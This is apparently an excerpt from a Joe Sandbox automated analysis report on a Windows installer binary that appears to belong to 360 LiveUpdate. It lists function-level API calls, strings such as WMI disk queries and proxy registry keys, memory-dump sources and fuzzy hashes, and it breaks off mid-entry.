                                                                                                                                                                      control_flow_graph 1481 1d3bfd-1d3c2a call 1e5454 CoCreateInstance 1484 1d3f39-1d3f42 1481->1484 1485 1d3c30-1d3c75 call 1c573a SysFreeString 1481->1485 1487 1d3f4a-1d3f51 call 1e54f9 1484->1487 1488 1d3f44-1d3f46 1484->1488 1493 1d3f29-1d3f31 1485->1493 1494 1d3c7b-1d3c90 CoSetProxyBlanket 1485->1494 1488->1487 1493->1484 1495 1d3f33-1d3f35 1493->1495 1494->1493 1496 1d3c96-1d3d33 call 1be782 call 17cbde call 16ba90 call 17cc03 call 1c573a call 1d17e6 SysFreeString * 2 1494->1496 1495->1484 1510 1d3d39-1d3d4d call 16ba90 1496->1510 1511 1d3f02-1d3f0b 1496->1511 1517 1d3db0-1d3db3 1510->1517 1512 1d3f0d-1d3f0f 1511->1512 1513 1d3f13-1d3f24 call 16dd20 * 2 1511->1513 1512->1513 1513->1493 1520 1d3d4f-1d3d73 1517->1520 1521 1d3db5 1517->1521 1525 1d3ddb-1d3de4 1520->1525 1526 1d3d75-1d3d90 VariantClear 1520->1526 1522 1d3dec-1d3e05 call 17cc03 1521->1522 1529 1d3e07-1d3e0c 1522->1529 1530 1d3e10-1d3e5f call 1c573a call 1d17e6 SysFreeString * 2 1522->1530 1525->1522 1528 1d3de6-1d3de8 1525->1528 1531 1d3d94-1d3d96 1526->1531 1528->1522 1529->1530 1544 1d3e65-1d3e6d 1530->1544 1545 1d3ef7-1d3efd call 16dd20 1530->1545 1533 1d3d9f-1d3da8 1531->1533 1534 1d3d98-1d3d9d 1531->1534 1533->1517 1537 1d3daa-1d3dac 1533->1537 1534->1533 1536 1d3db7-1d3dd6 call 1d2533 call 17cb91 call 16dd20 1534->1536 1536->1525 1537->1517 1544->1545 1549 1d3e73-1d3e92 1544->1549 1545->1511 1551 1d3e94-1d3eb5 VariantClear 1549->1551 1552 1d3ee6-1d3eef 1549->1552 1551->1552 1555 1d3eb7-1d3ebc 1551->1555 1552->1545 1553 1d3ef1-1d3ef3 1552->1553 1553->1545 1555->1552 1556 1d3ebe-1d3ed5 call 1d2599 1555->1556 1556->1552
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 001D3C04
                                                                                                                                                                      • CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,?,00000038,001D4568,?,?,?,?,?,0000001C,001CEAD1,?,?), ref: 001D3C22
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3C71
                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(0017BD49,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D3C88
                                                                                                                                                                        • Part of subcall function 001BE782: __EH_prolog3_GS.LIBCMT ref: 001BE789
                                                                                                                                                                        • Part of subcall function 001BE782: _wcslen.LIBCMT ref: 001BE7C4
                                                                                                                                                                        • Part of subcall function 001C573A: SysAllocString.OLEAUT32(?), ref: 001C5751
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3D26
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3D2F
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D3D79
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3E56
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3E5B
                                                                                                                                                                        • Part of subcall function 001D2533: __EH_prolog3.LIBCMT ref: 001D253A
                                                                                                                                                                        • Part of subcall function 001D2533: VariantInit.OLEAUT32(?), ref: 001D2556
                                                                                                                                                                        • Part of subcall function 001D2533: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 001D256B
                                                                                                                                                                        • Part of subcall function 001D2533: VariantClear.OLEAUT32(?), ref: 001D2589
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D3E98
                                                                                                                                                                      Strings
                                                                                                                                                                      • ROOT\CIMV2, xrefs: 001D3C36
                                                                                                                                                                      • WQL, xrefs: 001D3CF1, 001D3E21
                                                                                                                                                                      • DeviceID, xrefs: 001D3D8B
                                                                                                                                                                      • ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive, xrefs: 001D3DF2
                                                                                                                                                                      • Model, xrefs: 001D3EAA
                                                                                                                                                                      • ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition, xrefs: 001D3CC7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$FreeVariant$Clear$AllocBlanketChangeCreateH_prolog3H_prolog3_H_prolog3_catchInitInstanceProxyType_wcslen
                                                                                                                                                                      • String ID: ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive$ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition$DeviceID$Model$ROOT\CIMV2$WQL
                                                                                                                                                                      • API String ID: 3888685156-88420156
                                                                                                                                                                      • Opcode ID: f5622c2eacdb4f3dbc48845971d99d0d88a2f5e03142a72f0d8e0f16d06f9a9a
                                                                                                                                                                      • Instruction ID: 08535afe4a3e9683e1ac5d59902ba26a9fd21664b42ee176dfe13551f701879b
                                                                                                                                                                      • Opcode Fuzzy Hash: f5622c2eacdb4f3dbc48845971d99d0d88a2f5e03142a72f0d8e0f16d06f9a9a
                                                                                                                                                                      • Instruction Fuzzy Hash: 18B12571900249EFDF04DFE4C885EEDBBB9AF19304F24805AF515AB291CB71AE45CB62
                                                                                                                                                                      Function 5F4F5625 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4F5644
                                                                                                                                                                        • Part of subcall function 5F4F1914: __EH_prolog3.LIBCMT ref: 5F4F191B
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1926
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1930
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1940
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 5F4F56F7
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 5F4F5716
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5775
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5786
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5797
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F583E
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F5855
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F586C
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F590A
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5949
                                                                                                                                                                      • StrStrIW.SHLWAPI(?,http://,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,0000000C), ref: 5F4F5959
                                                                                                                                                                        • Part of subcall function 5F4F429A: __EH_prolog3.LIBCMT ref: 5F4F42B3
                                                                                                                                                                        • Part of subcall function 5F4F429A: StrStrIW.SHLWAPI(?,file://,00000001,00000000,00000000,00000000,000000FF), ref: 5F4F436A
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F438A
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F4398
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F43AB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_memset$CountH_prolog3Tick$_wcsncpy
                                                                                                                                                                      • String ID: [Update Ie Proxy] WPAD[%d], Proxy[%s], PAC[%s], DialUp[%d]$http://$http=$socks=
                                                                                                                                                                      • API String ID: 2113534588-487906059
                                                                                                                                                                      • Opcode ID: a28a54eb4f2d0851dba017d8f41997fa9e6bacdd51a355bf429dffa31879ab71
                                                                                                                                                                      • Instruction ID: 56c48b7c61991362d5f55304cc83d0417b6993a4ce7c1e40360e146e80c1650b
                                                                                                                                                                      • Opcode Fuzzy Hash: a28a54eb4f2d0851dba017d8f41997fa9e6bacdd51a355bf429dffa31879ab71
                                                                                                                                                                      • Instruction Fuzzy Hash: 16A12DB1511749ABDB14DFA4CC80AEF77F9BF44210F14462AE91EDA380EB30EA45CB90
                                                                                                                                                                      Function 0018540F Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 202COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • StrCpyW.SHLWAPI(?,?), ref: 00185469
                                                                                                                                                                      • StrCpyW.SHLWAPI(?,?), ref: 00185473
                                                                                                                                                                        • Part of subcall function 001848F2: __EH_prolog3.LIBCMT ref: 001848F9
                                                                                                                                                                        • Part of subcall function 001848F2: GetCurrentThreadId.KERNEL32 ref: 00184980
                                                                                                                                                                      • _strlen.LIBCMT ref: 00185487
                                                                                                                                                                        • Part of subcall function 00182982: __CxxThrowException@8.LIBCMT ref: 001829C2
                                                                                                                                                                        • Part of subcall function 00184E4C: GetCurrentThreadId.KERNEL32 ref: 00184E50
                                                                                                                                                                        • Part of subcall function 0018269D: __EH_prolog3.LIBCMT ref: 001826A4
                                                                                                                                                                        • Part of subcall function 00181BA2: GetStdHandle.KERNEL32(000000F5,?,00185699,0000000C,Extract ERROR: The file is not a valid Cabinet: %s,?,?,?,?,?,0022D4D1,00000000), ref: 00181BA8
                                                                                                                                                                        • Part of subcall function 00181BA2: SetConsoleTextAttribute.KERNEL32(00000000,?,0022D4D1,00000000), ref: 00181BAF
                                                                                                                                                                        • Part of subcall function 00181BA2: _vwprintf.LIBCMT ref: 00181BBE
                                                                                                                                                                        • Part of subcall function 00181BA2: _printf.LIBCMT ref: 00181BC8
                                                                                                                                                                        • Part of subcall function 00183C23: __EH_prolog3.LIBCMT ref: 00183C2A
                                                                                                                                                                        • Part of subcall function 00183C23: FreeLibrary.KERNEL32(?,00000004,0018565F,?,?,?,?,0022D4D1,00000000), ref: 00183C51
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CurrentThread$AttributeConsoleException@8FreeHandleLibraryTextThrow_printf_strlen_vwprintf
                                                                                                                                                                      • String ID: CAB Index: %d$CAB filesize: %d Bytes$Extract ERROR: Could not create FDI context:%s$Extract ERROR: Not all files could be extracted:%s$Extract ERROR: The file is not a valid Cabinet: %s$File count in CAB: %d$Folder count in CAB: %d$Has additional header data: %s$Has predecessor in splitted Cabinet: %s$Has successor in splitted Cabinet: %s$Set ID: %d$false$true
                                                                                                                                                                      • API String ID: 2826464441-2631079916
                                                                                                                                                                      • Opcode ID: e8df448088ef2bad7c4a0a87a1951d801bf7dede93e12a7d2bb50005dca7a8de
                                                                                                                                                                      • Instruction ID: d9eafa53c4f54cc9952b6d1acd704c0a826e1473d75ead7b678a9b1d11376858
                                                                                                                                                                      • Opcode Fuzzy Hash: e8df448088ef2bad7c4a0a87a1951d801bf7dede93e12a7d2bb50005dca7a8de
                                                                                                                                                                      • Instruction Fuzzy Hash: 0161AE72900658BBDB21FF90EC41EEE77B8EF29715F100165F809AB180EB749B15CBA0
                                                                                                                                                                      Function 5F4E4F3B Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 480COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F52AB44: __EH_prolog3_catch.LIBCMT ref: 5F52AB4B
                                                                                                                                                                      • GetLastError.KERNEL32(FF4173A1,00000000,?,00000000), ref: 5F4E4FA7
                                                                                                                                                                      • GetLastError.KERNEL32(00000001,FF4173A1,00000000,?,00000000), ref: 5F4E5020
                                                                                                                                                                        • Part of subcall function 5F50BFAE: __EH_prolog3.LIBCMT ref: 5F50BFB5
                                                                                                                                                                        • Part of subcall function 5F50BFAE: _memset.LIBCMT ref: 5F50C152
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4E53F1
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4E54D6
                                                                                                                                                                        • Part of subcall function 5F513F7C: _memset.LIBCMT ref: 5F513FAF
                                                                                                                                                                        • Part of subcall function 5F513F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513FCA
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.%3d] , xrefs: 5F4E52EF
                                                                                                                                                                      • ERR_HTTPMGR_DNS_NOT_FINISH, xrefs: 5F4E556F
                                                                                                                                                                      • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 5F4E5581
                                                                                                                                                                      • [%d.] Start Through FireWall http protocol PickUrl Failed, xrefs: 5F4E509D
                                                                                                                                                                      • [%d.] ErrorCode = %d,, xrefs: 5F4E502D
                                                                                                                                                                      • ERR_HTTPMGR_NOT_IP, xrefs: 5F4E510B, 5F4E552A
                                                                                                                                                                      • [%d.] Errcode = %u(%s), xrefs: 5F4E5122
                                                                                                                                                                      • [%d.] Start Through FireWall http protocol PickIp Failed, xrefs: 5F4E5204
                                                                                                                                                                      • [%d.%3d] ConnectNum = %d, xrefs: 5F4E54F7
                                                                                                                                                                      • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 5F4E5547
                                                                                                                                                                      • [%d.] ErrorCode = %d , , xrefs: 5F4E4FB4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$ErrorLast$CountH_prolog3H_prolog3_catchTickwvnsprintf
                                                                                                                                                                      • String ID: ERR_HTTPMGR_DNS_NOT_FINISH$ERR_HTTPMGR_NOT_IP$[%d.%3d] $[%d.%3d] ConnectNum = %d$[%d.] ErrorCode = %d , $[%d.] Errcode = %u(%s)$[%d.] ErrorCode = %d,$[%d.] Start Through FireWall http protocol PickIp Failed$[%d.] Start Through FireWall http protocol PickUrl Failed$[%d.] proxy=%d,Errcode = %u(%s), $[%d.] proxy=%d,Errcode = %u(%s),
                                                                                                                                                                      • API String ID: 2301807879-2515552278
                                                                                                                                                                      • Opcode ID: a917909481b316e21f7468959cb6c98c78643f9e9bdbaf3358c55e3e801cf59e
                                                                                                                                                                      • Instruction ID: 50430b682ee7aa2c95e600f01636a789db2ab00a375a6dc4927dcdb078ae4c43
                                                                                                                                                                      • Opcode Fuzzy Hash: a917909481b316e21f7468959cb6c98c78643f9e9bdbaf3358c55e3e801cf59e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9002A1F09017459FEB14DFA4C840BEAB7B6EF44302F00452EE656DB281DB76A954CBA2
                                                                                                                                                                      Function 5F51E724 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 88windowregistrythreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F51E732
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 5F51E760
                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 5F51E780
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 5F51E788
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,360AsyncNetwork,360AsyncNetwork,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5F51E795
                                                                                                                                                                        • Part of subcall function 5F51C5B6: SetTimer.USER32(?,00000000,00000064,00000000), ref: 5F51C5D6
                                                                                                                                                                      • SetEvent.KERNEL32(?,00000000), ref: 5F51E7B3
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 5F51E7C4
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 5F51E7CE
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 5F51E7DB
                                                                                                                                                                      • DestroyWindow.USER32(?,00000000), ref: 5F51E7F0
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 5F51E7F7
                                                                                                                                                                      • UnregisterClassW.USER32(360AsyncNetwork,00000000), ref: 5F51E7FF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$ClassDispatcherMessageUserWindow$CallbackCreateCurrentDestroyDispatchEventExceptionRegisterThreadTimerTranslateUnregister
                                                                                                                                                                      • String ID: 0$360AsyncNetwork$p2sp.Network
                                                                                                                                                                      • API String ID: 4253188931-2555541505
                                                                                                                                                                      • Opcode ID: 56088b72e2ba8fdd936482d6299a831ca16cb4acc06ca036ff3299506771a68e
                                                                                                                                                                      • Instruction ID: 58e247f0f783c8802a7c40f8af9cb531a00c2bfe336e4b74a67df13362370296
                                                                                                                                                                      • Opcode Fuzzy Hash: 56088b72e2ba8fdd936482d6299a831ca16cb4acc06ca036ff3299506771a68e
                                                                                                                                                                      • Instruction Fuzzy Hash: 1321ACB2D01228ABDB11AFE9C94CDDEBFFCFE49661B10042AF505E7100DB74591A8BA5
                                                                                                                                                                      Function 5F516DCB Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 110registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,00000000,5F57AC78,74DF30D0,?,5F5BC3F0,5F5BC288), ref: 5F516DF2
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F5BC288,?,?,5F5BC3F0,5F5BC288), ref: 5F516E17
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,?,5F5BC3F0,5F5BC288), ref: 5F516E2D
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F5BC288,?,?,5F5BC3F0,5F5BC288), ref: 5F516E4A
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\LiveUpdate360,00000000,00020019,5F5BC3F0), ref: 5F516E71
                                                                                                                                                                      • RegCloseKey.ADVAPI32(5F5BC3F0), ref: 5F516EF4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open$Create$Close
                                                                                                                                                                      • String ID: Intranet$Neverup$SOFTWARE\LiveUpdate360$customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                      • API String ID: 744170003-1635914898
                                                                                                                                                                      • Opcode ID: 58947b3343b0b1e7c0c6fa879eb15bd2a84b993e4dde93bd5c7ab9049ea59d35
                                                                                                                                                                      • Instruction ID: 2f40cba9a9986147986108d25b9e704bede8f036f10bfc061efa9ebda3edd4e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 58947b3343b0b1e7c0c6fa879eb15bd2a84b993e4dde93bd5c7ab9049ea59d35
                                                                                                                                                                      • Instruction Fuzzy Hash: C031C9B690110CFFEB119BD5DD48DEFBFBDEF44254F1000BAB545A2011D6316B69EA60
                                                                                                                                                                      Function 5F4FE53F Relevance: 24.2, APIs: 16, Instructions: 180timesynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 5F4FE546
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4FE56A
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 5F4FE5F1
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE600
                                                                                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 5F4FE628
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE632
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 5F4FE64B
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE658
                                                                                                                                                                      • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 5F4FE67C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE685
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$Create$TimerWaitable$Exception@8H_prolog3_catchMutexSemaphoreThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1927663649-0
                                                                                                                                                                      • Opcode ID: d7c3239bd5d02394680b5b159eca421fd19c47a1a27aeb5133065dcda259e46b
                                                                                                                                                                      • Instruction ID: 263350079f56a9a85d5da816351cb09ea1e94ec3795dfc1eb127e28e1bf7deb0
                                                                                                                                                                      • Opcode Fuzzy Hash: d7c3239bd5d02394680b5b159eca421fd19c47a1a27aeb5133065dcda259e46b
                                                                                                                                                                      • Instruction Fuzzy Hash: F46129F1900208DFE724DFB5D9849AEBBF9FB48211B04992EF51AD7740E770A9498F90
                                                                                                                                                                      Function 001CEA27 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 400COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CEA49
                                                                                                                                                                        • Part of subcall function 001C87F5: _memset.LIBCMT ref: 001C8838
